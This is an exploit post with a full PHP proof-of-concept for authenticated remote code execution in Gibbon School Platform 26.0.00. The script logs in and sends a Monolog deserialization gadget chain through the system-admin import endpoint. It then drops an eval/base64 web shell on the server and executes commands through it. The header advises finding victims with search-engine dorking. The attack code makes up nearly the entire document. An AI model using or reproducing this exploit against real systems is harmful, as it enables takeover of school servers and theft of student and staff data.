Gibbon School Platform 26.0.00 Code Injection
=============================================================================================================================================
| # Title : Gibbon School Platform 26.0.00 Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) |
| # Vendor : https://gibbonedu.org/ |
=============================================================================================================================================
POC :
[+] Dorking İn Google Or Other Search Enggine. [+] uses the CURL to Allow remote command . [+] Line 108 set your target . [+] save code as poc.php . [+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?php
class GibbonExploit
{
private $target_uri;
private $username;
private $password;
private $webshell_name;
public function __construct($target_uri, $username, $password, $webshell_name = null)
{
$this->target_uri = $target_uri;
$this->username = $username;
$this->password = $password;
$this->webshell_name = $webshell_name ?: $this->randomString() . ‘.php’;
}
private function send_request($method, $url, $data = null, $headers = [])
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);
if ($data) {
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
}
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
if (!empty($headers)) {
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
}
$response = curl_exec($ch);
curl_close($ch);
return $response;
}
public function gibbon_login()
{
$login_url = $this->target_uri . ‘/login.php?timeout=true’;
$data = [
‘address’ => ”,
‘method’ => ‘default’,
‘username’ => $this->username,
‘password’ => $this->password,
‘gibbonSchoolYearID’ => ‘025’,
‘gibboni18nID’ => ‘0002’
];
return $this->send_request(‘POST’, $login_url, http_build_query($data));
}
private function construct_form_data($payload)
{
$payload_len = strlen($payload);
$payload_data = ‘a:2:{i:7;O:32:”Monolog\\Handler\\SyslogUdpHandler”:1:{s:9:”\x00*\x00socket”;O:29:”Monolog\\Handler\\BufferHandler”:7:{s:10:”\x00*\x00handler”;r:3;s:13:”\x00*\x00bufferSize”;i:-1;s:9:”\x00*\x00buffer”;a:1:{i:0;a:2:{i:0;s:’ . $payload_len . ‘:”‘ . $payload . ‘”;s:5:”level”;N;}}s:8:”\x00*\x00level”;N;s:14:”\x00*\x00initialized”;b:1;s:14:”\x00*\x00bufferLimit”;i:-1;s:13:”\x00*\x00processors”;a:2:{i:0;s:7:”current”;i:1;s:6:”system”;}}}i:7;i:7;}’;
$form_data = [
‘address’ => ‘/modules/System Admin/import_run.php’,
‘mode’ => ‘sync’,
‘syncField’ => ‘N’,
‘syncColumn’ => ”,
‘columnOrder’ => $payload_data,
‘columnText’ => ‘N;’,
‘fieldDelimiter’ => ‘%2C’,
‘stringEnclosure’ => ‘%22’,
‘filename’ => $this->randomString() . ‘.xlsx’,
‘csvData’ => ‘”External Assessment”,”Assessment Data”,”Student”,”Field Name”,”Category”,”Field Name”,”Result”‘,
‘ignoreErrors’ => ‘1’,
‘Failed’ => ‘Submit’
];
return $form_data;
}
public function upload_webshell($b64_payload)
{
$php_payload = “echo \”<?php @eval(base64_decode(‘$b64_payload’));?>\” > ” . $this->webshell_name;
$form_data = $this->construct_form_data($php_payload);
$url = $this->target_uri . ‘/index.php?q=/modules/System%20Admin/import_run.php&type=externalAssessment&step=4’;
return $this->send_request(‘POST’, $url, http_build_query($form_data));
}
public function execute_php($cmd)
{
$b64_payload = base64_encode($cmd);
$res = $this->upload_webshell($b64_payload);
if (!$res) {
die(‘Web shell upload error.’);
}
// execute the webshell
$url = $this->target_uri . ‘/’ . $this->webshell_name;
return $this->send_request(‘GET’, $url);
}
private function randomString($length = 10)
{
return substr(str_shuffle(‘abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ’), 0, $length);
}
}
// Usage
$exploit = new GibbonExploit(‘https://target-site.com’, ‘[email protected]’, ‘password’);
$exploit->gibbon_login();
$response = $exploit->execute_php(‘phpinfo();’);
echo $response;
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================